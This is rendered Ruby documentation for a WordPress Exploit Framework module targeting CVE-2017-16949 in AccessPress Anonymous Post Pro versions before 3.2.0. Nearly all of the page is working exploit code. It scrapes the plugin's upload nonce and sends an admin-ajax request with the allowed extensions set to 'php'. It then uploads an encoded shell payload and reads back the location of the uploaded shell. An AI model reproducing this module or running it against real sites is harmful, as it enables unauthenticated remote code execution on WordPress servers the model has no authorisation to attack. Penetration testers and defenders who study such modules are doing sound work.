class Wpxf::Exploit::AccessPressAnonymousPostProShellUpload
Attributes
upload_nonce[RW]
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/accesspress_anonymous_post_pro_shell_upload.rb, line 6 def initialize super update_info( name: 'AccessPress Anonymous Post Pro < 3.2.0 Unauthenticated Shell Upload', author: [ 'Colette Chamberland', # Disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8977'], ['CVE', '2017-16949'] ], date: 'Dec 19 2017' ) end
Public Instance Methods
before_upload()
click to toggle source
# File lib/wpxf/modules/exploit/shell/accesspress_anonymous_post_pro_shell_upload.rb, line 27 def before_upload emit_info 'Acquiring upload nonce...' res = execute_get_request(url: full_uri) return false unless res&.code == 200 pattern = /var\sap_fileuploader\s=\s{.+?,"nonce":"([a-zA-Z0-9]+?)"};/i self.upload_nonce = res.body[pattern, 1] if upload_nonce.nil? emit_error 'Failed to acquire upload nonce' return false else emit_success "Acquired upload nonce: #{upload_nonce}", true return true end end
check()
click to toggle source
# File lib/wpxf/modules/exploit/shell/accesspress_anonymous_post_pro_shell_upload.rb, line 23 def check :unknown end
payload_body_builder()
click to toggle source
# File lib/wpxf/modules/exploit/shell/accesspress_anonymous_post_pro_shell_upload.rb, line 57 def payload_body_builder builder = Utility::BodyBuilder.new builder.add_file_from_string('qqfile', payload.encoded, payload_name) builder end
upload_request_params()
click to toggle source
# File lib/wpxf/modules/exploit/shell/accesspress_anonymous_post_pro_shell_upload.rb, line 48 def upload_request_params { 'action' => 'ap_file_upload_action', 'file_uploader_nonce' => upload_nonce, 'allowedExtensions[]' => 'php', 'sizeLimit' => '6400' } end
uploaded_payload_location()
click to toggle source
# File lib/wpxf/modules/exploit/shell/accesspress_anonymous_post_pro_shell_upload.rb, line 63 def uploaded_payload_location return nil if upload_result&.body.nil? res = JSON.parse(upload_result.body) res['url'] end
uploader_url()
click to toggle source
# File lib/wpxf/modules/exploit/shell/accesspress_anonymous_post_pro_shell_upload.rb, line 44 def uploader_url wordpress_url_admin_ajax end